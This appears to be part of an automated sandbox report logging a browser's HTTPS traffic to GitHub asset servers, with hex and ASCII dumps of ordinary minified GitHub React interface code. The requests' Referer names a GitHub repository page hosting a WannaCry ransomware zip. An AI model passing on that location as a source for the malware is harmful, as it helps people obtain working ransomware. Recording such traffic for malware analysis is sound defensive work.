                                                                                      2024-03-23 14:47:25 UTC16384INData Raw: 3d 6e 28 33 34 36 30 33 29 2c 65 37 3d 6e 28 39 31 38 36 33 29 2c 74 65 3d 6e 28 36 35 33 37 39 29 3b 6c 65 74 20 74 74 3d 5b 2e 30 30 37 2c 2e 30 31 34 2c 2e 30 33 2c 2e 30 34 39 2c 2e 30 38 34 2c 2e 31 34 2c 2e 32 33 2c 2e 33 38 2c 2e 36 32 2c 4e 75 6d 62 65 72 2e 4d 41 58 5f 56 41 4c 55 45 5d 2c 74 6e 3d 7b 22 73 63 61 6c 65 2e 6f 72 61 6e 67 65 2e 30 22 3a 22 23 66 66 64 66 62 36 22 2c 22 73 63 61 6c 65 2e 6f 72 61 6e 67 65 2e 31 22 3a 22 23 66 66 63 36 38 30 22 2c 22 73 63 61 6c 65 2e 6f 72 61 6e 67 65 2e 32 22 3a 22 23 66 30 38 38 33 65 22 2c 22 73 63 61 6c 65 2e 6f 72 61 6e 67 65 2e 33 22 3a 22 23 66 30 38 38 33 65 22 2c 22 73 63 61 6c 65 2e 6f 72 61 6e 67 65 2e 34 22 3a 22 23 64 62 36 64 32 38 22 2c 22 73 63 61 6c 65 2e 6f 72 61 6e 67 65 2e 35 22
                                                                                      Data Ascii: =n(34603),e7=n(91863),te=n(65379);let tt=[.007,.014,.03,.049,.084,.14,.23,.38,.62,Number.MAX_VALUE],tn={"scale.orange.0":"#ffdfb6","scale.orange.1":"#ffc680","scale.orange.2":"#f0883e","scale.orange.3":"#f0883e","scale.orange.4":"#db6d28","scale.orange.5"
                                                                                      2024-03-23 14:47:25 UTC16384INData Raw: 64 6f 6e 6c 79 22 3a 21 30 2c 69 6e 70 75 74 4d 6f 64 65 3a 22 6e 6f 6e 65 22 2c 74 61 62 49 6e 64 65 78 3a 30 2c 22 61 72 69 61 2d 6d 75 6c 74 69 6c 69 6e 65 22 3a 21 30 2c 22 61 72 69 61 2d 68 61 73 70 6f 70 75 70 22 3a 21 31 2c 22 64 61 74 61 2d 67 72 61 6d 6d 22 3a 22 66 61 6c 73 65 22 2c 22 64 61 74 61 2d 67 72 61 6d 6d 5f 65 64 69 74 6f 72 22 3a 22 66 61 6c 73 65 22 2c 22 64 61 74 61 2d 65 6e 61 62 6c 65 2d 67 72 61 6d 6d 61 72 6c 79 22 3a 22 66 61 6c 73 65 22 2c 73 74 79 6c 65 3a 7b 72 65 73 69 7a 65 3a 22 6e 6f 6e 65 22 2c 6d 61 72 67 69 6e 54 6f 70 3a 2d 32 2c 70 61 64 64 69 6e 67 4c 65 66 74 3a 65 41 2e 6a 6e 2c 70 61 64 64 69 6e 67 52 69 67 68 74 3a 65 41 2e 72 55 2c 64 69 73 70 6c 61 79 3a 22 68 69 64 64 65 6e 22 2c 77 69 64 74 68 3a 22 31 30
                                                                                      Data Ascii: donly":!0,inputMode:"none",tabIndex:0,"aria-multiline":!0,"aria-haspopup":!1,"data-gramm":"false","data-gramm_editor":"false","data-enable-grammarly":"false",style:{resize:"none",marginTop:-2,paddingLeft:eA.jn,paddingRight:eA.rU,display:"hidden",width:"10
                                                                                      2024-03-23 14:47:26 UTC16384INData Raw: 65 73 48 61 6e 64 6c 65 3a 73 2c 6f 6e 43 6f 64 65 4e 61 76 54 6f 6b 65 6e 53 65 6c 65 63 74 65 64 3a 65 2c 63 6f 64 65 53 65 63 74 69 6f 6e 73 3a 74 2c 63 6f 64 65 4c 69 6e 65 54 6f 53 65 63 74 69 6f 6e 4d 61 70 3a 6e 2c 76 61 6c 69 64 43 6f 64 65 4e 61 76 3a 69 2c 6f 6e 4c 69 6e 65 53 74 69 63 6b 4f 72 55 6e 73 74 69 63 6b 3a 6f 2c 73 65 61 72 63 68 52 65 73 75 6c 74 73 3a 6c 2c 66 6f 63 75 73 65 64 53 65 61 72 63 68 52 65 73 75 6c 74 3a 63 7d 29 3b 63 61 73 65 20 72 2e 4d 61 72 6b 64 6f 77 6e 3a 72 65 74 75 72 6e 28 30 2c 75 2e 6a 73 78 29 28 65 56 2c 7b 72 69 63 68 54 65 78 74 3a 64 2e 72 69 63 68 54 65 78 74 2c 73 78 3a 7b 62 6f 72 64 65 72 42 6f 74 74 6f 6d 4c 65 66 74 52 61 64 69 75 73 3a 22 36 70 78 22 2c 62 6f 72 64 65 72 42 6f 74 74 6f 6d 52 69
                                                                                      Data Ascii: esHandle:s,onCodeNavTokenSelected:e,codeSections:t,codeLineToSectionMap:n,validCodeNav:i,onLineStickOrUnstick:o,searchResults:l,focusedSearchResult:c});case r.Markdown:return(0,u.jsx)(eV,{richText:d.richText,sx:{borderBottomLeftRadius:"6px",borderBottomRi
                                                                                      2024-03-23 14:47:26 UTC16384INData Raw: 56 69 73 75 61 6c 2c 7b 22 61 72 69 61 2d 68 69 64 64 65 6e 22 3a 22 74 72 75 65 22 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 75 2e 6a 73 78 29 28 48 2e 49 2c 7b 63 68 69 6c 64 72 65 6e 3a 28 30 2c 75 2e 6a 73 78 29 28 22 6b 62 64 22 2c 7b 63 68 69 6c 64 72 65 6e 3a 22 65 22 7d 29 7d 29 7d 29 5d 7d 29 7d 29 2c 65 26 26 74 26 26 28 30 2c 75 2e 6a 73 78 29 28 65 73 2e 53 2e 44 69 76 69 64 65 72 2c 7b 7d 29 2c 74 26 26 28 30 2c 75 2e 6a 73 78 29 28 6e 43 2c 7b 65 64 69 74 45 6e 61 62 6c 65 64 3a 72 2c 67 69 74 68 75 62 44 65 76 55 72 6c 3a 69 2c 67 68 44 65 73 6b 74 6f 70 50 61 74 68 3a 6c 2c 6f 6e 42 72 61 6e 63 68 3a 73 7d 29 5d 7d 29 7d 74 72 79 7b 6e 53 2e 64 69 73 70 6c 61 79 4e 61 6d 65 7c 7c 28 6e 53 2e 64 69 73 70 6c 61 79 4e 61 6d 65 3d 22 45 64 69 74
                                                                                      Data Ascii: Visual,{"aria-hidden":"true",children:(0,u.jsx)(H.I,{children:(0,u.jsx)("kbd",{children:"e"})})})]})}),e&&t&&(0,u.jsx)(es.S.Divider,{}),t&&(0,u.jsx)(nC,{editEnabled:r,githubDevUrl:i,ghDesktopPath:l,onBranch:s})]})}try{nS.displayName||(nS.displayName="Edit
                                                                                      2024-03-23 14:47:26 UTC16384INData Raw: 29 2c 28 6b 7c 7c 46 3d 3d 3d 72 2e 43 6f 64 65 26 26 6e 75 6c 6c 21 3d 3d 69 2e 72 61 77 4c 69 6e 65 73 26 26 74 29 26 26 28 30 2c 75 2e 6a 73 78 29 28 65 73 2e 53 2e 44 69 76 69 64 65 72 2c 7b 7d 29 2c 28 30 2c 75 2e 6a 73 78 29 28 6e 47 2c 7b 70 61 74 68 3a 6c 2c 75 70 64 61 74 65 54 6f 6f 6c 74 69 70 4d 65 73 73 61 67 65 3a 57 7d 29 2c 28 30 2c 75 2e 6a 73 78 29 28 65 73 2e 53 2e 44 69 76 69 64 65 72 2c 7b 7d 29 2c 71 26 26 28 30 2c 75 2e 6a 73 78 73 29 28 75 2e 46 72 61 67 6d 65 6e 74 2c 7b 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 75 2e 6a 73 78 29 28 65 73 2e 53 2e 47 72 6f 75 70 2c 7b 74 69 74 6c 65 3a 22 43 6f 70 69 6c 6f 74 22 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 75 2e 6a 73 78 29 28 6e 56 2c 7b 66 69 6c 65 52 65 66 65 72 65 6e 63 65 3a 4a 7d 29
                                                                                      Data Ascii: ),(k||F===r.Code&&null!==i.rawLines&&t)&&(0,u.jsx)(es.S.Divider,{}),(0,u.jsx)(nG,{path:l,updateTooltipMessage:W}),(0,u.jsx)(es.S.Divider,{}),q&&(0,u.jsxs)(u.Fragment,{children:[(0,u.jsx)(es.S.Group,{title:"Copilot",children:(0,u.jsx)(nV,{fileReference:J})
                                                                                      2024-03-23 14:47:26 UTC16384INData Raw: 66 66 65 63 74 29 28 28 29 3d 3e 7b 77 7c 7c 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 52 2e 4b 47 29 3f 2e 66 6f 63 75 73 28 29 7d 2c 5b 77 5d 29 3b 6c 65 74 20 4c 3d 60 24 7b 6e 7d 2d 24 7b 69 3f 22 64 65 66 69 6e 69 74 69 6f 6e 22 3a 22 72 65 66 65 72 65 6e 63 65 22 7d 2d 67 72 6f 75 70 60 3b 72 65 74 75 72 6e 28 30 2c 75 2e 6a 73 78 73 29 28 24 2e 5a 2c 7b 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 75 2e 6a 73 78 73 29 28 24 2e 5a 2c 7b 73 78 3a 7b 66 6f 6e 74 53 69 7a 65 3a 30 2c 70 78 3a 33 2c 70 79 3a 32 2c 64 69 73 70 6c 61 79 3a 22 66 6c 65 78 22 2c 6a 75 73 74 69 66 79 43 6f 6e 74 65 6e 74 3a 22 73 70 61 63 65 2d 62 65 74 77 65 65 6e 22 2c 62 6f 72 64 65 72 54 6f 70 3a 22 31 70 78 20 73 6f 6c 69 64 22 2c 62 6f 72 64
                                                                                      Data Ascii: ffect)(()=>{w||document.getElementById(eR.KG)?.focus()},[w]);let L=`${n}-${i?"definition":"reference"}-group`;return(0,u.jsxs)($.Z,{children:[(0,u.jsxs)($.Z,{sx:{fontSize:0,px:3,py:2,display:"flex",justifyContent:"space-between",borderTop:"1px solid",bord
                                                                                      2024-03-23 14:47:26 UTC16384INData Raw: 73 74 61 72 74 2e 63 6f 6c 75 6d 6e 26 26 6e 75 6c 6c 21 3d 3d 74 2e 62 6c 6f 62 52 61 6e 67 65 2e 65 6e 64 2e 63 6f 6c 75 6d 6e 26 26 74 2e 62 6c 6f 62 52 61 6e 67 65 2e 65 6e 64 2e 63 6f 6c 75 6d 6e 2d 74 2e 62 6c 6f 62 52 61 6e 67 65 2e 73 74 61 72 74 2e 63 6f 6c 75 6d 6e 3e 32 26 26 65 2e 73 74 79 6c 69 6e 67 44 69 72 65 63 74 69 76 65 73 26 26 65 2e 73 74 79 6c 69 6e 67 44 69 72 65 63 74 69 76 65 73 5b 74 2e 62 6c 6f 62 52 61 6e 67 65 2e 73 74 61 72 74 2e 6c 69 6e 65 2d 31 5d 3f 2e 6c 65 6e 67 74 68 26 26 78 3f 2e 62 6c 6f 62 4c 69 6e 65 73 5b 74 2e 62 6c 6f 62 52 61 6e 67 65 2e 73 74 61 72 74 2e 6c 69 6e 65 2d 31 5d 3b 69 66 28 6e 29 7b 6c 65 74 20 6e 3d 78 2e 62 6c 6f 62 4c 69 6e 65 73 5b 74 2e 62 6c 6f 62 52 61 6e 67 65 2e 73 74 61 72 74 2e 6c 69
                                                                                      Data Ascii: start.column&&null!==t.blobRange.end.column&&t.blobRange.end.column-t.blobRange.start.column>2&&e.stylingDirectives&&e.stylingDirectives[t.blobRange.start.line-1]?.length&&x?.blobLines[t.blobRange.start.line-1];if(n){let n=x.blobLines[t.blobRange.start.li
                                                                                      2024-03-23 14:47:26 UTC16384INData Raw: 64 61 62 6f 74 43 6f 6e 66 69 67 75 72 61 74 69 6f 6e 42 61 6e 6e 65 72 22 29 7d 63 61 74 63 68 7b 7d 74 72 79 7b 72 48 2e 64 69 73 70 6c 61 79 4e 61 6d 65 7c 7c 28 72 48 2e 64 69 73 70 6c 61 79 4e 61 6d 65 3d 22 44 69 72 65 63 74 69 6f 6e 73 46 6f 72 4e 6f 6e 44 65 66 61 75 6c 74 42 72 61 6e 63 68 22 29 7d 63 61 74 63 68 7b 7d 76 61 72 20 72 47 3d 6e 28 39 38 36 34 31 29 3b 66 75 6e 63 74 69 6f 6e 20 72 55 28 7b 63 68 69 6c 64 72 65 6e 3a 65 2c 6d 65 64 69 61 55 72 6c 3a 74 2c 6d 65 64 69 61 50 72 65 76 69 65 77 53 72 63 3a 6e 2c 69 63 6f 6e 53 76 67 3a 72 2c 74 61 73 6b 54 69 74 6c 65 3a 69 2c 74 61 73 6b 50 61 74 68 3a 61 2c 6f 72 67 3a 6f 7d 29 7b 72 65 74 75 72 6e 28 30 2c 75 2e 6a 73 78 73 29 28 24 2e 5a 2c 7b 61 73 3a 22 73 65 63 74 69 6f 6e 22 2c
                                                                                      Data Ascii: dabotConfigurationBanner")}catch{}try{rH.displayName||(rH.displayName="DirectionsForNonDefaultBranch")}catch{}var rG=n(98641);function rU({children:e,mediaUrl:t,mediaPreviewSrc:n,iconSvg:r,taskTitle:i,taskPath:a,org:o}){return(0,u.jsxs)($.Z,{as:"section",


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      69192.168.2.1649774185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:25 UTC736OUTGET /assets/vendors-node_modules_primer_react_lib-esm_Button_IconButton_js-node_modules_primer_react_lib--23bcad-01764c79fa41.js HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Origin: https://github.com
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:25 UTC687INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 32239
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: application/javascript
                                                                                      Last-Modified: Thu, 07 Mar 2024 16:45:15 GMT
                                                                                      ETag: 0x8DC3EC5F6F9F47D
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:25 GMT
                                                                                      Age: 1368172
                                                                                      X-Served-By: cache-iad-kjyo7100118-IAD, cache-ewr18167-EWR
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 42, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: ffcd0bea9912664c0e1a8fbdfdc19164c828d704
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 70 72 69 6d 65 72 5f 72 65 61 63 74 5f 6c 69 62 2d 65 73 6d 5f 42 75 74 74 6f 6e 5f 49 63 6f 6e 42 75 74 74 6f 6e 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 70 72 69 6d 65 72 5f 72 65 61 63 74 5f 6c 69 62 2d 2d 32 33 62 63 61 64 22 2c 22 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 70 72 69 6d 65 72 5f 72 65 61 63 74 5f 6c 69 62 2d 65 73 6d 5f 42 75 74 74 6f 6e 5f 49 63 6f 6e 42 75 74 74 6f 6e 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 70
                                                                                      Data Ascii: "use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["vendors-node_modules_primer_react_lib-esm_Button_IconButton_js-node_modules_primer_react_lib--23bcad","vendors-node_modules_primer_react_lib-esm_Button_IconButton_js-node_modules_p
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 28 75 29 3b 6c 65 74 20 70 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6c 65 74 20 74 3d 6e 65 77 20 41 62 6f 72 74 43 6f 6e 74 72 6f 6c 6c 65 72 3b 72 65 74 75 72 6e 20 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 61 62 6f 72 74 22 2c 28 29 3d 3e 7b 74 2e 61 62 6f 72 74 28 29 7d 29 2c 74 7d 28 63 29 3b 69 66 28 72 29 7b 6c 65 74 20 65 3d 72 3b 72 2e 63 6f 6e 74 61 69 6e 65 72 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 66 6f 63 75 73 2d 74 72 61 70 22 2c 22 73 75 73 70 65 6e 64 65 64 22 29 2c 72 2e 63 6f 6e 74 72 6f 6c 6c 65 72 2e 61 62 6f 72 74 28 29 2c 61 2e 70 75 73 68 28 65 29 7d 70 2e 73 69 67 6e 61 6c 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 61 62 6f 72 74 22 2c 28 29 3d 3e 7b 72 3d 76 6f 69 64 20 30 7d 29
                                                                                      Data Ascii: (u);let p=function(e){let t=new AbortController;return e.addEventListener("abort",()=>{t.abort()}),t}(c);if(r){let e=r;r.container.setAttribute("data-focus-trap","suspended"),r.controller.abort(),a.push(e)}p.signal.addEventListener("abort",()=>{r=void 0})
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 6e 2e 64 28 74 2c 7b 56 3a 28 29 3d 3e 4e 7d 29 3b 76 61 72 20 72 3d 6e 28 36 37 32 39 34 29 2c 6f 3d 6e 28 31 35 33 38 38 29 2c 61 3d 6e 28 34 32 34 38 33 29 2c 69 3d 6e 28 31 35 31 37 33 29 2c 6c 3d 6e 28 33 31 31 37 31 29 2c 73 3d 6e 28 38 38 32 31 36 29 2c 63 3d 6e 28 34 32 33 37 39 29 2c 64 3d 6e 28 36 36 30 34 34 29 2c 75 3d 6e 28 33 35 30 34 38 29 2c 66 3d 6e 28 34 38 35 34 32 29 2c 70 3d 6e 28 31 34 35 34 33 29 2c 68 3d 6e 28 31 36 35 34 35 29 2c 6d 3d 6e 28 39 38 38 33 33 29 2c 67 3d 6e 28 38 35 35 32 39 29 2c 62 3d 6e 28 31 37 38 34 30 29 2c 76 3d 6e 28 34 31 39 30 35 29 2c 79 3d 6e 28 37 33 32 36 38 29 3b 66 75 6e 63 74 69 6f 6e 20 77 28 29 7b 72 65 74 75 72 6e 28 77 3d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 3f 4f 62 6a 65 63 74 2e 61 73 73 69
                                                                                      Data Ascii: n.d(t,{V:()=>N});var r=n(67294),o=n(15388),a=n(42483),i=n(15173),l=n(31171),s=n(88216),c=n(42379),d=n(66044),u=n(35048),f=n(48542),p=n(14543),h=n(16545),m=n(98833),g=n(85529),b=n(17840),v=n(41905),y=n(73268);function w(){return(w=Object.assign?Object.assi
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 72 67 65 3a 22 36 34 30 70 78 22 7d 2c 45 3d 6f 2e 5a 50 2e 64 69 76 2e 77 69 74 68 43 6f 6e 66 69 67 28 7b 64 69 73 70 6c 61 79 4e 61 6d 65 3a 22 44 69 61 6c 6f 67 5f 5f 53 74 79 6c 65 64 44 69 61 6c 6f 67 22 2c 63 6f 6d 70 6f 6e 65 6e 74 49 64 3a 22 73 63 2d 75 61 78 6a 73 6e 2d 31 22 7d 29 28 5b 22 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 22 2c 22 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 22 2c 22 3b 77 69 64 74 68 3a 22 2c 22 3b 68 65 69 67 68 74 3a 22 2c 22 3b 6d 69 6e 2d 77 69 64 74 68 3a 32 39 36 70 78 3b 6d 61 78 2d 77 69 64 74 68 3a 63 61 6c 63 28 31 30 30 76 77 20 2d 20 36 34 70 78 29 3b 6d 61 78 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31
                                                                                      Data Ascii: rge:"640px"},E=o.ZP.div.withConfig({displayName:"Dialog__StyledDialog",componentId:"sc-uaxjsn-1"})(["display:flex;flex-direction:column;background-color:",";box-shadow:",";width:",";height:",";min-width:296px;max-width:calc(100vw - 64px);max-height:calc(1
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 74 65 72 27 5d 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 76 61 72 28 2d 2d 62 6f 72 64 65 72 52 61 64 69 75 73 2d 6c 61 72 67 65 2c 30 2e 37 35 72 65 6d 29 3b 77 69 64 74 68 3a 22 2c 22 3b 68 65 69 67 68 74 3a 22 2c 22 3b 7d 26 5b 64 61 74 61 2d 70 6f 73 69 74 69 6f 6e 2d 6e 61 72 72 6f 77 3d 27 62 6f 74 74 6f 6d 27 5d 7b 77 69 64 74 68 3a 31 30 30 76 77 3b 68 65 69 67 68 74 3a 61 75 74 6f 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 76 77 3b 6d 61 78 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 36 34 70 78 29 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 76 61 72 28 2d 2d 62 6f 72 64 65 72 52 61 64 69 75 73 2d 6c 61 72 67 65 2c 30 2e 37 35 72 65 6d 29 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 72 69 67 68 74 2d 72 61 64 69 75 73 3a 30
                                                                                      Data Ascii: ter']{border-radius:var(--borderRadius-large,0.75rem);width:",";height:",";}&[data-position-narrow='bottom']{width:100vw;height:auto;max-width:100vw;max-height:calc(100vh - 64px);border-radius:var(--borderRadius-large,0.75rem);border-bottom-right-radius:0
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 2e 5a 29 2c 4f 3d 28 7b 64 69 61 6c 6f 67 4c 61 62 65 6c 49 64 3a 65 2c 74 69 74 6c 65 3a 74 2c 73 75 62 74 69 74 6c 65 3a 6e 2c 64 69 61 6c 6f 67 44 65 73 63 72 69 70 74 69 6f 6e 49 64 3a 6f 2c 6f 6e 43 6c 6f 73 65 3a 69 7d 29 3d 3e 7b 6c 65 74 20 6c 3d 28 30 2c 72 2e 75 73 65 43 61 6c 6c 62 61 63 6b 29 28 28 29 3d 3e 7b 69 28 22 63 6c 6f 73 65 2d 62 75 74 74 6f 6e 22 29 7d 2c 5b 69 5d 29 3b 72 65 74 75 72 6e 20 72 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 4e 2e 48 65 61 64 65 72 2c 6e 75 6c 6c 2c 72 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 61 2e 5a 2c 7b 64 69 73 70 6c 61 79 3a 22 66 6c 65 78 22 7d 2c 72 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 61 2e 5a 2c 7b 64 69 73 70 6c 61 79 3a 22 66 6c 65 78 22 2c 70 78 3a 32 2c 70 79 3a 22 36 70 78 22
                                                                                      Data Ascii: .Z),O=({dialogLabelId:e,title:t,subtitle:n,dialogDescriptionId:o,onClose:i})=>{let l=(0,r.useCallback)(()=>{i("close-button")},[i]);return r.createElement(N.Header,null,r.createElement(a.Z,{display:"flex"},r.createElement(a.Z,{display:"flex",px:2,py:"6px"
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 7c 22 22 3b 69 66 28 22 68 69 64 64 65 6e 22 21 3d 3d 65 29 72 65 74 75 72 6e 20 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 3d 22 68 69 64 64 65 6e 22 2c 28 29 3d 3e 7b 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 3d 65 7d 7d 2c 5b 5d 29 3b 6c 65 74 20 44 3d 28 6e 75 6c 6c 21 3d 61 3f 61 3a 4f 29 28 52 29 2c 4c 3d 28 6e 75 6c 6c 21 3d 69 3f 69 3a 6a 29 28 52 29 2c 49 3d 28 6e 75 6c 6c 21 3d 73 3f 73 3a 43 29 28 52 29 2c 4e 3d 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 62 3f 7b 22 64 61 74 61 2d 70 6f 73 69 74 69 6f 6e 2d 72 65 67 75 6c 61 72 22 3a 62 7d 3a 4f 62 6a 65 63 74 2e 66 72 6f 6d 45 6e 74 72 69 65 73 28 4f 62 6a 65 63 74 2e 65 6e 74 72 69 65 73 28 62 29 2e 6d
                                                                                      Data Ascii: |"";if("hidden"!==e)return document.body.style.overflow="hidden",()=>{document.body.style.overflow=e}},[]);let D=(null!=a?a:O)(R),L=(null!=i?i:j)(R),I=(null!=s?s:C)(R),N="string"==typeof b?{"data-position-regular":b}:Object.fromEntries(Object.entries(b).m
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 2e 55 32 29 28 22 73 70 61 63 65 2e 33 22 29 2c 69 2e 5a 29 2c 44 3d 6f 2e 5a 50 2e 64 69 76 2e 77 69 74 68 43 6f 6e 66 69 67 28 7b 64 69 73 70 6c 61 79 4e 61 6d 65 3a 22 44 69 61 6c 6f 67 5f 5f 46 6f 6f 74 65 72 22 2c 63 6f 6d 70 6f 6e 65 6e 74 49 64 3a 22 73 63 2d 75 61 78 6a 73 6e 2d 36 22 7d 29 28 5b 22 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 2d 31 70 78 20 30 20 22 2c 22 3b 70 61 64 64 69 6e 67 3a 22 2c 22 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 77 72 61 70 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 66 6c 65 78 2d 65 6e 64 3b 67 61 70 3a 22 2c 22 3b 7a 2d 69 6e 64 65 78 3a 31 3b 66 6c 65 78 2d 73 68 72 69 6e 6b 3a 30 3b 22 2c 22 3b 22 5d 2c 28 30 2c 63 2e 55 32 29 28 22 63 6f 6c 6f 72 73 2e 62 6f 72 64 65 72 2e
                                                                                      Data Ascii: .U2)("space.3"),i.Z),D=o.ZP.div.withConfig({displayName:"Dialog__Footer",componentId:"sc-uaxjsn-6"})(["box-shadow:0 -1px 0 ",";padding:",";display:flex;flex-flow:wrap;justify-content:flex-end;gap:",";z-index:1;flex-shrink:0;",";"],(0,c.U2)("colors.border.
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 74 2e 61 73 73 69 67 6e 3f 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 2e 62 69 6e 64 28 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 31 3b 74 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 7b 76 61 72 20 6e 3d 61 72 67 75 6d 65 6e 74 73 5b 74 5d 3b 66 6f 72 28 76 61 72 20 72 20 69 6e 20 6e 29 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 6e 2c 72 29 26 26 28 65 5b 72 5d 3d 6e 5b 72 5d 29 7d 72 65 74 75 72 6e 20 65 7d 29 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 6c 65 74 20 6c 3d 72 2e 66 6f 72 77 61 72 64 52 65 66 28 28 65 2c 74 29 3d 3e 7b 6c 65 74 7b 69 63 6f 6e 3a 6e 2c 2e 2e 2e 6f 7d 3d 65 3b 72 65 74 75 72 6e 20 72 2e
                                                                                      Data Ascii: t.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var n=arguments[t];for(var r in n)Object.prototype.hasOwnProperty.call(n,r)&&(e[r]=n[r])}return e}).apply(this,arguments)}let l=r.forwardRef((e,t)=>{let{icon:n,...o}=e;return r.
